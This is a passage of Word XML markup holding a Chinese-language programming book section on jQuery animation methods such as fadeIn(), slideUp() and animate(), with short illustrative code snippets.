        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画方法传入第二个参数（也是可选的），该参数是一个函数，会在动画完成时调用。该函数在调用时不</w:t>
      </w:r>
      <w:r>
        <w:t>会有任何参数传入，但</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值会设置为发生动画的文档元素。对于每个选中元素都会调用一次该回调函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用淡入效果快速显示元素，动画完成时，在元素里显示一些文字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#message").fadeIn("fast",function(){$(this).text("Hello World");});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给动画方法传入回调函数，可以在动画结束时执行操作。不过，如果只是想顺序执行多段动画的话，回调方式是没有必要的。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画默认是队列化的（</w:t>
      </w:r>
      <w:r>
        <w:t>19.5.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“2.</w:t>
      </w:r>
      <w:r>
        <w:t>动画选项对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>节会讲述如何覆盖默认方</w:t>
      </w:r>
      <w:r>
        <w:t>式）。如果一个元素已经在动画过程中，再调用一个动画方法时，新动画不会立刻执行，而会延迟到当前动画结束后才执行。例如，可以让一个元素在持久显示前，先闪烁一阵：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$("#blinker").fadeIn(100).fadeOut(100).fadeIn(100).fadeOut(100).fadeIn();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画方法可以接受可选的时长和回调参数。还可以传入一个对象来调用动画方法，该对象的属性指定动画选项：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将时长和回调参数作为对象属性而不是参数传入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#message").fadeIn({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>duration:"fast",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>complete:function(){$(this).text("Hello World");}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使用通用的</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，经常传入选项对象作为参数，其实，这也可以用于更简单的动画方法。使用选项对象可以设置高级选项，比如控制动画的队列和缓动。</w:t>
      </w:r>
      <w:r>
        <w:t>19.5.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“2.</w:t>
      </w:r>
      <w:r>
        <w:t>动画选项对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>节会讲述可用的选项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="488" w:name="19_5_1_Jian_Dan_Dong_Hua_"/>
      <w:r>
        <w:t>19.5.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　简单动画</w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>个简单的动画方法用来隐藏和显示元素。根据实现的动画类型，它们可</w:t>
      </w:r>
      <w:r>
        <w:t>以分为三组：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fadeIn()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>fadeTo()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这是最简单的动画：</w:t>
      </w:r>
      <w:r>
        <w:t>fadeIn()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>简单地改变</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>属性来显示或隐藏元素。两者都接受可选的时长和回调参数。</w:t>
      </w:r>
      <w:r>
        <w:t>fadeTo()</w:t>
      </w:r>
      <w:r>
        <w:t>稍有不同：它需要传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>目标值，</w:t>
      </w:r>
      <w:r>
        <w:t>fadeTo()</w:t>
      </w:r>
      <w:r>
        <w:t>会将元素的当前</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>值变化到目标值。调用</w:t>
      </w:r>
      <w:r>
        <w:t>fadeTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，第一参数必须是时长（或选项对象），第二参数是</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>目标值，回调函数则是可选的第三个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面的</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>adeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以让元素不可见，但依旧保留了元素在文档布局中的占位。</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>方法则会将元素从布局中移除，就好像把</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>none</w:t>
      </w:r>
      <w:r>
        <w:t>一样。当不带参数调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只是简单地立刻隐藏或显示选中元素。带有时长（或选项对象）参数时，它们会让隐藏或显示有个动画过程。</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>在将元素的</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>减少到</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>时，同时它还会将元素的宽度和高度收缩到</w:t>
      </w:r>
      <w:r>
        <w:t>0.show()</w:t>
      </w:r>
      <w:r>
        <w:t>则进行反向操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
      <w:r>
        <w:t>可以改变在上面调用它的元素的可视状态：如果隐藏，则调用</w:t>
      </w:r>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
      <w:r>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>如果显示，则调用</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>。与</w:t>
      </w:r>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，必须传入时长或选项对象给</w:t>
      </w:r>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
      <w:r>
        <w:t>来产生动画效果。给</w:t>
      </w:r>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
      <w:r>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>和不带参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
      <w:r>
        <w:t>是一样的，传入</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>则和不带参</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数调用</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>是一样的。注意，如果传入两个或多个函数参数给</w:t>
      </w:r>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
      <w:r>
        <w:t>，它会注册为事件处理程序，这在</w:t>
      </w:r>
      <w:r>
        <w:t>19.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节讲述过。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>slideDown()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>slideUp()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>slideToggle()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>slideUp()</w:t>
      </w:r>
      <w:r>
        <w:t>会隐藏</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的元素，方式是将其高度动态变化到</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，然后设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>di</w:t>
      </w:r>
      <w:r>
        <w:t>splay</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"none"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>slideDown()</w:t>
      </w:r>
      <w:r>
        <w:t>执行反向操作，来使得隐藏的元素再次可见。</w:t>
      </w:r>
      <w:r>
        <w:t>slideToggle()</w:t>
      </w:r>
      <w:r>
        <w:t>使用向上滑动或向下滑动动画来切换元素的可见性。这三个方法都接受可选的时长和回调参数（或选项对象参数）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面是一个例子，它调用了该组方法中的每一个。要记得</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画默认情况下是队列化的，因此这些动画会一个接一个执行：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用淡出效果将所有图像隐藏，然后显示它们，接着向上滑动，再向下滑动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").fadeOut().show(300).slideUp().slideToggl</w:t>
      </w:r>
      <w:r>
        <w:t>e();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>各种</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>插件（参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.9</w:t>
      </w:r>
      <w:r>
        <w:t>节）会添加额外的动画方法到</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库中。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>类库（参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.10</w:t>
      </w:r>
      <w:r>
        <w:t>节）拥有一套特别全面的动画效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="489" w:name="19_5_2_Zi_Ding_Yi_Dong_Hua_"/>
      <w:r>
        <w:t>19.5.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　自定义动画</w:t>
      </w:r>
      <w:bookmarkEnd w:id="489"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>与简单动画方法实现的效果相比，使用</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以实现更多通用动画效果。传给</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的第一个参数指定动画内容，剩余参数指定如何定制动画。第一个参数是必需的：它必须是一个对象，该对象的属性指定要变化的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性和它们的目标值。</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会将每个元素的这些</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性从初始值变化到指定的目标值。例如，上面描述的</w:t>
      </w:r>
      <w:r>
        <w:t>slideUp()</w:t>
      </w:r>
      <w:r>
        <w:t>效果可以用以下代码来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将所有图片的高度缩小到</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").animate({height:0});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第二个参数是可选的，可以传入一</w:t>
      </w:r>
      <w:r>
        <w:t>个选项对象给</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#sprite").animate({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>opacity:.25,//</w:t>
      </w:r>
      <w:r>
        <w:t>将不透明度调整为</w:t>
      </w:r>
      <w:r>
        <w:t>0.25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font-size:10//</w:t>
      </w:r>
      <w:r>
        <w:t>将字体大小变化到</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>像素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>?duration:500,//</w:t>
      </w:r>
      <w:r>
        <w:t>动画持续半秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>complete:function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>在动画完成时调用该函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.text("Goodbye");//</w:t>
      </w:r>
      <w:r>
        <w:t>改变元素的文本</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除了将选项对象作为第二个参数传入，</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还允许将三个最常用的选项作为参数传入。可以将动画时长（数值或字符</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>串）作为第二个参数传入。可以指定缓动函数名为第三个参数。（很快会讲解缓动函数。）最后可以将回调函数指定为第四个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常，</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法接受两个对象参数。第一个指定动画内容，第二个指定如何定制动画。要彻底理解如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>来实现动画，还需要弄明白这两个对象的更多细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>动画属性对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的第一个参数必须是对象。该对象的属性名必须是</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性名，这些属性的值必须是动画的目标值。动画只支持数值属性：对于颜色、字体或</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>等枚举属性是无法实现动画效果的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>。如果属性值是数值，则默认单位是像素。如果属性值是字符串，可以指定单位。如果省略单位，则默认依旧是像素。还可以指定相对值，用</w:t>
      </w:r>
      <w:r>
        <w:t>“+=”</w:t>
      </w:r>
      <w:r>
        <w:t>前缀表示增加，或用</w:t>
      </w:r>
      <w:r>
        <w:t>“-=”</w:t>
      </w:r>
      <w:r>
        <w:t>表示减少。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("p").animate({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"margin-left":"+=.5in",//</w:t>
      </w:r>
      <w:r>
        <w:t>增加段落缩进</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>opacity:"-=.1"//</w:t>
      </w:r>
      <w:r>
        <w:t>同时减少不透明度</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注意上面的对象字面量中属性名</w:t>
      </w:r>
      <w:r>
        <w:t>"margin-left"</w:t>
      </w:r>
      <w:r>
        <w:t>两旁引号的使用。属性名中的连字符表示这不是一个合法的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>标识符，所以它必须用引号括起来。当然，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>也允许使用</w:t>
      </w:r>
      <w:r>
        <w:t>marginLeft</w:t>
      </w:r>
      <w:r>
        <w:t>这种大小写混合的写法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了数值（可以带有单位、</w:t>
      </w:r>
      <w:r>
        <w:t>“+=”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“-=”</w:t>
      </w:r>
      <w:r>
        <w:t>前缀），在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画属性对象中，还可以使用三个其他值。</w:t>
      </w:r>
      <w:r>
        <w:t>"hide"</w:t>
      </w:r>
      <w:r>
        <w:t>值会保存属性的当前值，然后将该属性的值变化到</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>"show"</w:t>
      </w:r>
      <w:r>
        <w:t>值会将</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值还原到之前保存的值。如果一段动画使用了</w:t>
      </w:r>
      <w:r>
        <w:t>"show"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会在动画完成时调用</w:t>
      </w:r>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。如果一段动画使用了</w:t>
      </w:r>
      <w:r>
        <w:t>"hide"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会在动画完成时调用</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>还可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>"toggle"</w:t>
      </w:r>
      <w:r>
        <w:t>来实现显示或隐藏，具体效果取决于该属性的当前设置。可以用下面的代码实现</w:t>
      </w:r>
      <w:r>
        <w:t>"slideRight"</w:t>
      </w:r>
      <w:r>
        <w:t>效果（和</w:t>
      </w:r>
      <w:r>
        <w:t>slideUp()</w:t>
      </w:r>
      <w:r>
